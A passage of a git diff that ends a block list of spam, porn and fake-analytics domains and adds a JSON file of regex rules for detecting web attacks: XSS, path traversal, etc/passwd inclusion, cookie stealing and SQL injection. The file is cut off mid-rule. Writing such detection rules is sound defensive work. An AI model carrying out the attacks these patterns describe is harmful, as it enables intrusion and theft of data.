+waterefficiency.co
+waterpurifier.club
+watracker.net
+watsonrealtycorp.com
+waycash.net
+waysbetter.cn
+wcb.su
+wdfdocando.com
+wdrake.com
+we-are-gamers.com
+web-analytics.date
+web-betting.ru
+web.cvut.cz
+webads.co.nz
+webadvance.club
+webalan.ru
+webcamdevochka.com
+webcamtalk.net
+webenlace.com.ar
+webextract.profound.net
+webinstantservice.com
+webix.biz
+webix.me
+webjam.com
+webkeyit.com
+weblibrary.win
+weblo.com
+webmasterhome.cn
+webmasters.stackexchange.com
+webmonetizer.net
+webnode.me
+weboptimizes.com
+webpromotion.ae
+webradiology.ru
+webs.com
+webscouter.net
+webshoppermac.com
+website-analytics.online
+website-analyzer.info
+website-audit.com.ua
+website-datenbank.de
+website-speed-check.site
+website-speed-checker.site
+website-speed-up.site
+website-speed-up.top
+website-stealer.nufaq.com
+websiteaccountant.de
+websiteexplorer.info
+websites-reviews.com
+websitevaluebot.com
+webstatsdomain.org
+webtherapy.ru
+weburlopener.com
+weburok.com
+wechatdownload10.com
+weclipart.com
+wedding-salon.net
+wedding0venues.tk
+weddingdresses.xyz
+weekes.biz.tc
+weightatraining.com
+wejdz-tu.pl
+welck.octopis.com
+welcomeauto.ru
+wellcome2slovenia.ru
+wemarketing.se
+wemedinc.com
+weprik.ru
+wesharepics.com
+wesharepics.info
+wesharepics.site
+westen-v.life
+westen-z.life
+westermarkanjou.se
+westsextube.com
+westum.se
+westvilletowingservices.co.za
+wetgames.ru
+wfb.hatedriveapart.com
+whatistizanidine2mg.blogspot.com
+whatistizanidinehclusedfor.blogspot.com
+whatsappbot.flyland.ru
+whatsappdownload10.com
+whatsupinfoley.com
+whatzmyip.net
+wheelchairliftsarea.com
+whengirlsgowild.com
+where-toget.com
+whereiskentoday.com
+whereverdesperate.gq
+while.cheapwebsitehoster.com
+whipme.yopoint.in
+white-truck.life
+whiteelephantwellington.com
+whiteproduct.com
+wholesalecheapjerseysfree.com
+wholesalejerseychinaoutlet.com
+wholesalejerseychinashop.com
+wholesalejerseys-cheapest.com
+wholesalejerseyscheapjerseys.us.com
+wholesalejerseysgaa.com
+wholesalenfljerseys.us.com
+wholinkstome.com
+whos.amung.us
+whosonmyserver.com
+wieseversa.no
+wikes.20fr.com
+wildcattube.com
+wildnatureimages.com
+wildworld.site
+williamrobsonproperty.com
+win-spy.com
+windowssearch-exp.com
+wineitudes.wordpress.com
+wineration.com
+wingsoffury2.com
+wingsofrefuge.net
+winner7777.net
+winterclassichockeyjerseys.com
+winwotgold.pl
+winx-play.ru
+wiosenny-bon-1500.pl
+witclub.info
+witherrom55.eklablog.fr
+withstandingheartwarming.com
+wjgony.com
+wladimirpayen.com
+wleuaprpxuvr.ga
+wma-x.com
+wnhjavlhezp.gq
+wnoz.de
+womama.ru
+woman-h.ru
+woman-orgasm.ru
+woman-tampon.ru
+womens-journal.net
+womensplay.net
+womensterritory.ru
+wonderfulflowers.biz
+woodyguthrie.se
+word-vorlagen.net
+word-vorlagen.xyz
+wordkeyhelper.com
+wordpress-crew.net
+wordpresscore.com
+workle.website
+works.if.ua
+world-mmo.com
+worldhistory.biz
+worldinternetauthority.com
+worldis.me
+worldlovers.ru
+worldmusicfests.com
+worldoffiles.ru
+worldtraveler.world
+wormix-cheats.ru
+worst-sites.online
+wosik-dach.service-for-web.de
+wovis.site
+wowas31.ucoz.ru
+wowcasinoonline.ooo
+woweb.com.ua
+wpsecurity.website
+wpthemedetector.co.uk
+writersgroup580.web.fc2.com
+writingservices17.blogspot.ru
+wrona.it
+wrz0iuebwhp5fg.freeddns.com
+ws.ampower.me
+wsgames.ru
+wstroika.ru
+wtsindia.in
+wttavern.com
+wufak.com
+wurr.voila.net
+ww1943.ru
+ww2awards.info
+www.888.com
+www.arenda-yeisk.ru
+www.bookmaker-bets.com
+www.ehscloud.cn
+www.event-tracking.com
+www.get-free-traffic-now.com
+www.jbetting.com
+www.kabbalah-red-bracelets.com
+www.labves.ru
+www.pinnacle-bets.com
+www.solartek.ru
+www.souvenirua.com
+www.timer4web.com
+www.wohnkabinen-shop.de
+wwwadultcheck.com
+wygraj-skiny.win
+wygraj-teraz.com
+wyniki-lista.pl
+wzgyyq.com
+x-diesel.biz
+x-diesel.com
+x-diesel.info
+x-diesel.org
+x-lime.com
+x-lime.net
+x-mix.info
+x-musics.com
+x-porno.video
+x-rates.ru
+x-stars.ru
+x-true.info
+x5market.ru
+x69ty.ru
+xaijo.com
+xaylapdiendanang.com
+xbaboon.com
+xblog.in
+xblognetwork.com
+xboxster.ru
+xcc24.pl
+xchangetrak.com
+xchat26.myfreecams.com
+xclicks.net
+xcombear.ru
+xdoza.com
+xedserver.com
+xep.info
+xerox-douglas.cf
+xev.ru
+xfire.com
+xfluro.com
+xgames-04.com
+xgftnlrt.bloger.index.hr
+xingzi-vision.com
+xitjw.info
+xjlottery.com
+xjrul.com
+xkaz.org
+xlolitka.com
+xlovecam.com
+xmladserver.com
+xmlinde.com
+xmnb.net
+xmronta.com
+xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai
+xn-----6kcaabbafhu7cskl7akvongwpo7hvjj.xn--p1ai
+xn-----6kcaacnblni5c5bicdpcmficy.xn--p1ai
+xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai
+xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai
+xn-----7kceclhb4abre1b4a0ccl2fxch1a.xn--p1ai
+xn-----8kcatubaocd1bneepefojs1h2e.xn--p1ai
+xn----7sbaaabaei0cc8aj5bj0bncejx.xn--p1ai
+xn----7sbahjd3btneuw1joc.xn--p1ai
+xn----7sbaphztdjeboffeiof6c.xn--p1ai
+xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai
+xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai
+xn----7sbho2agebbhlivy.xn--p1ai
+xn----7sbifcamovvfggw9d.xn--p1ai
+xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks
+xn----8sbdbjgb1ap7a9c4czbh.xn--p1acf
+xn----8sbhefaln6acifdaon5c6f4axh.xn--p1ai
+xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai
+xn----9sbebi2bvzr7h.xn--p1ai
+xn----9sbubg3ambdfl1j.xn--p1ai
+xn----btbdvdh4aafrfciljm6k.xn--p1ai
+xn----ctbbcjd3dbsehgi.xn--p1ai
+xn----ctbigni3aj4h.xn--p1ai
+xn----dtbndd4ae7eub.top
+xn----itbeirbjbi7bc6bh2d.xn--p1ai
+xn----itbkqkfiq.xn--p1ai
+xn--1-8sbcpb0bdm8k6a.xn--p1ai
+xn--24-glceagatoq7c2a6ioc.xn--p1ai
+xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai
+xn--80aaagvmjabrs1aoc9luc.xn--p1ai
+xn--80aaajbdbddwj2alwjieei2afr3v.xn--p1ai
+xn--80aaaks3bbhabgbigamdr2h.xn--p1ai
+xn--80aafb2a.xn--p1ai
+xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai
+xn--80aanaardaperhcem4a6i.com
+xn--80ab4aa2g.xn--p1ai
+xn--80abgj3a5acid6ghs.top
+xn--80adaggc5bdhlfamsfdij4p7b.xn--p1ai
+xn--80aeahghtf8ac5i.xn--p1ai
+xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai
+xn--80ahdheogk5l.xn--p1ai
+xn--80ahvj9e.xn--p1ai
+xn--80aikhbrhr.net
+xn--80ajbshivpvn2i.xn--p1ai
+xn--80ajjbdhgmudixfjc8c5a9df8b.xn--p1ai
+xn--80ak6aa92e.com
+xn--80aodinpgi.xn--p1ai
+xn--80atua3d.xn--p1ai
+xn--90acenikpebbdd4f6d.xn--p1ai
+xn--b1adccaf1bzj.xn--p1ai
+xn--b1addnj3cah.xn--p1ai
+xn--b1ag5cfn.xn--p1ai
+xn--b1agm2d.net
+xn--c1acygb.xn--p1ai
+xn--d1abj0abs9d.in.ua
+xn--d1acah0c.xn--p1ai
+xn--d1aifoe0a9a.top
+xn--e1afanlbnfckd7c3d.xn--p1ai
+xn--e1aggki3c.xn--80adxhks
+xn--h1aakne2ba.xn--p1ai
+xn--h1ahbi.com.ua
+xn--hxazdsfy.blogspot.com
+xn--l1aengat.xn--p1ai
+xn--lifehacer-1rb.com
+xn--oogle-wmc.com
+xn--q1a.xn--b1aube0e.xn--c1acygb.xn--p1ai
+xnxx-n.com
+xnxx699.com
+xnxxandxvideos.com
+xolodremont.ru
+xportvusbdriver8i.snack.ws
+xpresscare.ru
+xrus.org
+xsfetish.org
+xsion.net
+xtraffic.plus
+xtrafficplus.com
+xtremeeagles.net
+xtube.com
+xtubeporno.net
+xuki.us
+xvideosbay.com
+xvideosporn.biz
+xvideospornoru.com
+xwatt.ru
+xxart.ru
+xxlargepop.com
+xxx-cam.webcam
+xxx-treker.ru
+xxxasianporn.net
+xxxdatinglocal.us
+xxxguitars.com
+xxxhdvideo.site
+xxxkaz.org
+xxxmania.top
+xxxnatelefon.ru
+xxxrus.org
+xxxsiterips.xyz
+xxxtube69.com
+xxxtubesafari.com
+xz618.com
+xzlive.com
+y8games-free.com
+yaaknaa.info
+yachts-cruise.info
+yaderenergy.ru
+yadro.ru
+yaminecraft.ru
+yaoguangdj.com
+yatrk.xyz
+yeartwit.com
+yebocasino.co.za
+yebocasino.com
+yellocloud.be
+yellowads.men
+yellowfootprints.com
+yellowproxy.net
+yellowstonesafaritours.com
+yellowstonevisitortours.com
+yes-com.com
+yginekologa.com
+yhit.press
+ynymnwbm.bloger.index.hr
+yogamatsexpert.com
+yoluxuryevents.com
+yoopsie.com
+yopoint.in
+yoshkarola.zrus.org
+yottos.com
+you-shall-not-pass.is74.ru
+youandcredit.ru
+youbloodyripper.com
+youbrainboost.asia
+youdao.com
+youdesigner.kz
+yougame.biz
+yougetsignal.com
+youghbould.wordpress.com
+yougotanewdomain.com
+youjizz.com
+youjizz.vc
+youporn-forum.ga
+youporn-ru.com
+your-bearings.com
+youradexchange.com
+yourads.website
+youradulthosting.com
+youraticles.pl
+yourdesires.ru
+youresponsive.com
+yourmovies.pl
+yourothersite.com
+yourporn.com
+yourporngay.com
+yoursearch.me
+yourserverisdown.com
+yoursite.com
+yourtemplatefinder.com
+yousense.info
+youthreaders.com
+youtoner.it
+youtube-downloader.savetubevideo.com
+youtubedownload.org
+youtubologia.it
+youtuhe.com
+ypmuseum.ru
+ytmnd.com
+yuarra.pluto.ro
+yubikk.info
+yugk.net
+yugo-star.ru
+yun56.co
+yunque.pluto.ro
+yur-p.ru
+yurgorod.ru
+yuweng.info
+z-master.ru
+za-fun-offer.com
+za-music.mymobiplanet.com
+zaapplesales.blogspot.com
+zacreditom.ru
+zagadki.in.ua
+zahvat.ru
+zaidia.xhost.ro
+zaim-pod-zalog-krasnodar.ru
+zaimhelp.ru
+zaimite.ru
+zajm-pod-zalog-nedvizhimosti.ru
+zajm-zalog-krasnodar.ru
+zakazfutbolki.com
+zakazvzloma.com
+zakon-ob-obrazovanii.ru
+zakonobosago.ru
+zaloadi.ru
+zaloro.com
+zambini.ru
+zaobao.com.sg
+zapatosenventa.info
+zapiszto.pl
+zarabiaj-dzis.pl
+zarabotat-na-sajte.ru
+zarabotok--doma.ru
+zarajbuilders.com
+zarenica.net
+zarepta.com
+zastenchivosti.net
+zastroyka.org
+zatjmuzu.info
+zawyna.ua
+zazagames.org
+zdesformula.ru
+zdesoboi.com
+zebradudka.com
+zebramart.ru
+zed21.net
+zeg-distribution.com
+zeikopay.com
+zeleznobeton.ru
+zero1.it
+zerocash.msk.ru
+zeroredirect.com
+zeroredirect1.com
+zeroredirect10.com
+zeroredirect11.com
+zeroredirect12.com
+zeroredirect2.com
+zeroredirect5.com
+zeroredirect6.com
+zeroredirect7.com
+zeroredirect8.com
+zeroredirect9.com
+zetgie.com.pl
+zetmaster.ru
+zhacker.net
+zhongwenlink.com
+zhorapankratov7.blogspot.com
+zhuravlev.info
+zigarettenonl.canalblog.com
+zigarettenonlinekaufen.tumblr.com
+zigarettenonlinekaufen1.bloog.pl
+zigarettenonlinekaufen1.blox.pl
+zigarettenonlinekaufen2.bloog.pl
+zigarettenonlinekaufen2.drupalgardens.com
+zigzog.ru
+zionstar.net
+zirondelli.it
+zixizop.net.ru
+zkjovpdgxivg.ga
+zlatnajesen.com
+zmoda.hostreo.com
+znakom.sibtest.ru
+znakomstva-moskva77.ru
+znakomstva-piter78.ru
+znakomstvaonlain.ru
+znaniyapolza.ru
+znaturaloriginal.com
+zocaparj.kz
+zog.link
+zojirushi-products.ru
+zolotoy-lis.ru
+zona-aqua.ru
+zone-kev717.info
+zoodrawings.com
+zoogdiesney.com
+zoogdinsney.com
+zoogdisany.com
+zooggames.com
+zoolubimets.ru
+zoominfo.com
+zoomovies.org
+zoompegs.com
+zoosexart.com
+zootoplist.com
+zootravel.com
+zophim.me
+zrelaya.pw
+zreloeporno.tv
+zrizvtrnpale.tk
+zrus.org
+zryydi.com
+zs2vm.top
+zscaler.net
+zscalerone.net
+zscalertwo.net
+zskdla.site
+zverokruh-shop.cz
+zvetki.ru
+zvezdagedon.ru
+zvooq.eu
+zvuker.net
+zx6.ru
+zygophyceous.womanstars.site
+zynax.ua
+zytpirwai.net
+zzbroya.com.ua
+zzlgxh.com
\ No newline at end of file
diff --git a/db/common-web-attacks.json b/db/common-web-attacks.json
new file mode 100644
index 00000000..70cad69c
--- /dev/null
+++ b/db/common-web-attacks.json
@@ -0,0 +1 @@
+{"filters":[{"id":1,"rule":"(?:\"[^\"]*[^-]?>)|(?:[^\\w\\s]\\s*\\/>)|(?:>\")","description":"finds html breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":2,"rule":"(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])","description":"finds attribute breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":3,"rule":"(?:^>[\\w\\s]*<\\/?\\w{2,}>)","description":"finds unquoted attribute breaking injections","tags":["xss","csrf"],"impact":2},{"id":4,"rule":"(?:[+\\/]\\s*name[\\W\\d]*[)+])|(?:;\\W*url\\s*=)|(?:[^\\w\\s\\/?:>]\\s*(?:location|referrer|name)\\s*[^\\/\\w\\s-])","description":"Detects url-, name-, JSON, and referrer-contained payload attacks","tags":["xss","csrf"],"impact":5},{"id":5,"rule":"(?:\\W\\s*hash\\s*[^\\w\\s-])|(?:\\w+=\\W*[^,]*,[^\\s(]\\s*\\()|(?:\\?\"[^\\s\"]\":)|(?:(?<!\\/)__[a-z]+__)|(?:(?:^|[\\s)\\]\\}])(?:s|g)etter\\s*=)","description":"Detects hash-contained xss payload attacks, setter usage and property overloading","tags":["xss","csrf"],"impact":5},{"id":6,"rule":"(?:with\\s*\\(\\s*.+\\s*\\)\\s*\\w+\\s*\\()|(?:(?:do|while|for)\\s*\\([^)]*\\)\\s*\\{)|(?:\\/[\\w\\s]*\\[\\W*\\w)","description":"Detects self contained xss via with(), common loops and regex to string conversion","tags":["xss","csrf"],"impact":5},{"id":7,"rule":"(?:[=(].+\\?.+:)|(?:with\\([^)]*\\)\\))|(?:\\.\\s*source\\W)","description":"Detects JavaScript with(), ternary operators and XML predicate attacks","tags":["xss","csrf"],"impact":5},{"id":8,"rule":"(?:\\/\\w*\\s*\\)\\s*\\()|(?:\\([\\w\\s]+\\([\\w\\s]+\\)[\\w\\s]+\\))|(?:(?<!(?:mozilla\\/\\d\\.\\d\\s))\\([^)[]+\\[[^\\]]+\\][^)]*\\))|(?:[^\\s!][{([][^({[]+[{([][^}\\])]+[}\\])][\\s+\",\\d]*[}\\])])|(?:\"\\)?\\]\\W*\\[)|(?:=\\s*[^\\s:;]+\\s*[{([][^}\\])]+[}\\])];)","description":"Detects self-executing JavaScript functions","tags":["xss","csrf"],"impact":5},{"id":9,"rule":"(?i)(?:\\\\u(?:\\{(0{1,})?[a-f0-9]{2}\\}|00[a-f0-9]{2}))|(?:\\\\x0*[a-f0-9]{2})|(?:\\\\\\d{2,3})","description":"Detects the IE octal, hex and unicode entities","tags":["xss","csrf"],"impact":2},{"id":10,"rule":"(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})","description":"Detects basic directory traversal","tags":["dt","id","lfi"],"impact":5},{"id":11,"rule":"(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)","description":"Detects specific directory and path traversal","tags":["dt","id","lfi"],"impact":5},{"id":12,"rule":"(?:etc\\/\\W*passwd)","description":"Detects etc/passwd inclusion attempts","tags":["dt","id","lfi"],"impact":5},{"id":13,"rule":"(?:%u(?:ff|00|e\\d)\\w\\w)|(?:(?:%(?:e\\w|c[^3\\W]|))(?:%\\w\\w)(?:%\\w\\w)?)","description":"Detects halfwidth/fullwidth encoded unicode HTML breaking attempts","tags":["xss","csrf"],"impact":3},{"id":14,"rule":"(?:#@~\\^\\w+)|(?:\\w+script:|@?import\\s*\\(?|;base64|base64,)|(?:\\w\\s*\\([\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+\\))","description":"Detects possible includes, VBSCript/JScript encoded and packed functions","tags":["xss","csrf","id","rfe"],"impact":5},{"id":15,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:create(?:element|attribute|textnode)|[a-z]+events?|setattribute|getelement\\w+|appendchild|createrange|createcontextualfragment|removenode|parentnode|decodeuricomponent|\\wettimeout|(?:ms)?setimmediate|option|useragent)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.+\\-]))","description":"Detects JavaScript DOM/miscellaneous properties and methods","tags":["xss","csrf","id","rfe"],"impact":6},{"id":16,"rule":"([^*\\s\\w,.\\/?+-]\\s*)?(?<![a-mo-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:alert|inputbox|showmod(?:al|eless)dialog|showhelp|infinity|isnan|isnull|iterator|msgbox|executeglobal|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate|jquery|getscript|extend|prototype)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.:\\/+\\-]))","description":"Detects possible includes and typical script methods","tags":["xss","csrf","id","rfe"],"impact":5},{"id":17,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:hash|name|href|navigateandfind|source|pathname|close|constructor|port|protocol|assign|replace|back|forward|document|ownerdocument|window|top|this|self|parent|frames|_?content|date|cookie|innerhtml|innertext|csstext+?|outerhtml|print|moveby|resizeto|createstylesheet|stylesheets)(?(1)[^\\w%\"]|(?:\\s*[^@\\/\\s\\w%.+\\-])['\"`])","description":"Detects JavaScript object properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":18,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:join|pop|push|reverse|reduce|concat|map|shift|sp?lice|sort|unshift)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript array properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":19,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:set|atob|btoa|charat|charcodeat|charset|concat|crypto|frames|fromcharcode|indexof|lastindexof|match|navigator|toolbar|menubar|replace|regexp|slice|split|substr|substring|escape|\\w+codeuri\\w*)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript string properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":20,"rule":"(?:\\)\\s*\\[)|([^*\":\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z_@\\|])(\\s*return\\s*)?(?:globalstorage|sessionstorage|postmessage|callee|constructor|content|domain|prototype|try|catch|top|call|apply|url|function|object|array|string|math|if|for\\s*(?:each)?|elseif|case|switch|regex|boolean|location|(?:ms)?setimmediate|settimeout|setinterval|void|setexpression|namespace|while)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\".+\\-\\/]))","description":"Detects JavaScript language constructs","tags":["xss","csrf","id","rfe"],"impact":4},{"id":21,"rule":"(?:,\\s*(?:alert|showmodaldialog|eval)\\s*,)|(?::\\s*eval\\s*[^\\s])|([^:\\s\\w,.\\/?+-]\\s*)?(?<![a-z\\/_@])(\\s*return\\s*)?(?:(?:document\\s*\\.)?(?:.+\\/)?(?:alert|eval|msgbox|showmod(?:al|eless)dialog|showhelp|prompt|write(?:ln)?|confirm|dialog|open))\\s*(?:[^.a-z\\s\\-]|(?:\\s*[^\\s\\w,.@\\/+-]))|(?:java[\\s\\/]*\\.[\\s\\/]*lang)|(?:\\w\\s*=\\s*new\\s+\\w+)|(?:&\\s*\\w+\\s*\\)[^,])|(?:\\+[\\W\\d]*new\\s+\\w+[\\W\\d]*\\+)|(?:document\\.\\w)","description":"Detects very basic XSS probings","tags":["xss","csrf","id","rfe"],"impact":3},{"id":22,"rule":"(?:=\\s*(?:top|this|window|content|self|frames|_content))|(?:\\/\\s*[gimx]*\\s*[)}])|(?:[^\\s]\\s*=\\s*script)|(?:\\.\\s*constructor)|(?:default\\s+xml\\s+namespace\\s*=)|(?:\\/\\s*\\+[^+]+\\s*\\+\\s*\\/)","description":"Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces","tags":["xss","csrf","id","rfe"],"impact":5},{"id":23,"rule":"(?:\\.\\s*\\w+\\W*=)|(?:\\W\\s*(?:location|document)\\s*\\W[^({[;]+[({[;])|(?:\\(\\w+\\?[:\\w]+\\))|(?:\\w{2,}\\s*=\\s*\\d+[^&\\w]\\w+)|(?:\\]\\s*\\(\\s*\\w+)","description":"Detects JavaScript location/document property access and window access obfuscation","tags":["xss","csrf"],"impact":5},{"id":24,"rule":"(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])","description":"Detects basic obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":25,"rule":"(?:=\\s*[$\\w]\\s*[\\(\\[])|(?:\\(\\s*(?:this|top|window|self|parent|_?content)\\s*\\))|(?:src\\s*=s*(?:\\w+:|\\/\\/))|(?:\\w+\\[(\"\\w+\"|\\w+\\|\\|))|(?:[\\d\\W]\\|\\|[\\d\\W]|\\W=\\w+,)|(?:\\/\\s*\\+\\s*[a-z\"])|(?:=\\s*\\$[^([]*\\()|(?:=\\s*\\(\\s*\")","description":"Detects obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":26,"rule":"(?:[^:\\s\\w]+\\s*[^\\w\\/](href|protocol|host|hostname|pathname|hash|port|cookie)[^\\w])","description":"Detects JavaScript cookie stealing and redirection attempts","tags":["xss","csrf"],"impact":4},{"id":27,"rule":"(?:(?:vbs|vbscript|data):.*[,+])|(?:\\w+\\s*=\\W*(?!https?)\\w+:)|(jar:\\w+:)|(=\\s*\"?\\s*vbs(?:ript)?:)|(language\\s*=\\s?\"?\\s*vbs(?:ript)?)|on\\w+\\s*=\\*\\w+\\-\"?","description":"Detects data: URL injections, VBS injections and common URI schemes","tags":["xss","rfe"],"impact":5},{"id":28,"rule":"(?:firefoxurl:\\w+\\|)|(?:(?:file|res|telnet|nntp|news|mailto|chrome)\\s*:\\s*[%&#xu\\/]+)|(wyciwyg|firefoxurl\\s*:\\s*\\/\\s*\\/)","description":"Detects IE firefoxurl injections, cache poisoning attempts and local file inclusion/execution","tags":["xss","rfe","lfi","csrf"],"impact":5},{"id":29,"rule":"(?:binding\\s?=|moz-binding|behavior\\s?=)|(?:[\\s\\/]style\\s*=\\s*[-\\\\])","description":"Detects bindings and behavior injections","tags":["xss","csrf","rfe"],"impact":4},{"id":30,"rule":"(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:\\/\\s*\\?\\s*\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)","description":"Detects common XSS concatenation patterns 1/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":31,"rule":"(?:=\\s*\\d*\\.\\d*\\?\\d*\\.\\d*)|(?:[|&]{2,}\\s*\")|(?:!\\d+\\.\\d*\\?\")|(?:\\/:[\\w.]+,)|(?:=[\\d\\W\\s]*\\[[^]]+\\])|(?:\\?\\w+:\\w+)","description":"Detects common XSS concatenation patterns 2/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":32,"rule":"(?:[^\\w\\s=]on(?!g\\&gt;)\\w+[^=_+-]*=[^$]+(?:\\W|\\&gt;)?)","description":"Detects possible event handlers","tags":["xss","csrf"],"impact":4},{"id":33,"rule":"(?:\\<\\w*:?\\s(?:[^\\>]*)t(?!rong))|(?:\\<scri)|(<\\w+:\\w+)","description":"Detects obfuscated script tags and XML wrapped HTML","tags":["xss"],"impact":4},{"id":34,"rule":"(?:\\<\\/\\w+\\s\\w+)|(?:@(?:cc_on|set)[\\s@,\"=])","description":"Detects attributes in closing tags and conditional compilation tokens","tags":["xss","csrf"],"impact":4},{"id":35,"rule":"(?:--[^\\n]*$)|(?:\\<!-|-->)|(?:[^*]\\/\\*|\\*\\/[^*])|(?:(?:[\\W\\d]#|--|{)$)|(?:\\/{3,}.*$)|(?:<!\\[\\W)|(?:\\]!>)","description":"Detects common comment types","tags":["xss","csrf","id"],"impact":3},{"id":37,"rule":"(?:\\<base\\s+)|(?:<!(?:element|entity|\\[CDATA))","description":"Detects base href injections and XML entity injections","tags":["xss","csrf","id"],"impact":5},{"id":38,"rule":"(?:\\<[\\/]?(?:[i]?frame|applet|isindex|marquee|keygen|script|audio|video|input|button|textarea|style|base|body|meta|link|object|embed|param|plaintext|xm\\w+|image|im(?:g|port)))","description":"Detects possibly malicious html elements including some attributes","tags":["xss","csrf","id","rfe","lfi"],"impact":4},{"id":39,"rule":"(?:\\\\x[01fe][\\db-ce-f])|(?:%[01fe][\\db-ce-f])|(?:&#[01fe][\\db-ce-f])|(?:\\\\[01fe][\\db-ce-f])|(?:&#x[01fe][\\db-ce-f])","description":"Detects nullbytes and other dangerous characters","tags":["id","rfe","xss"],"impact":5},{"id":40,"rule":"(?:\\)\\s*when\\s*\\d+\\s*then)|(?:\"\\s*(?:#|--|{))|(?:\\/\\*!\\s?\\d+)|(?:ch(?:a)?r\\s*\\(\\s*\\d)|(?:(?:(n?and|x?or|not)\\s+|\\|\\||\\&\\&)\\s*\\w+\\()","description":"Detects MySQL comments, conditions and ch(a)r injections","tags":["sqli","id","lfi"],"impact":6},{"id":41,"rule":"(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])","description":"Detects conditional SQL injection attempts","tags":["sqli","id","lfi"],"impact":6},{"id":42,"rule":"(?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:^.?\"$)|(?:(?:^[\"\\\\]*(?:[\\d\"]+|[^\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[^\\w\\s]\\w+\\s*[|-]\\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[^\\w\\s])|(?:[^\\w\\s:]\\s*\\d\\W+[^\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W)","description":"Detects classic SQL injection probings 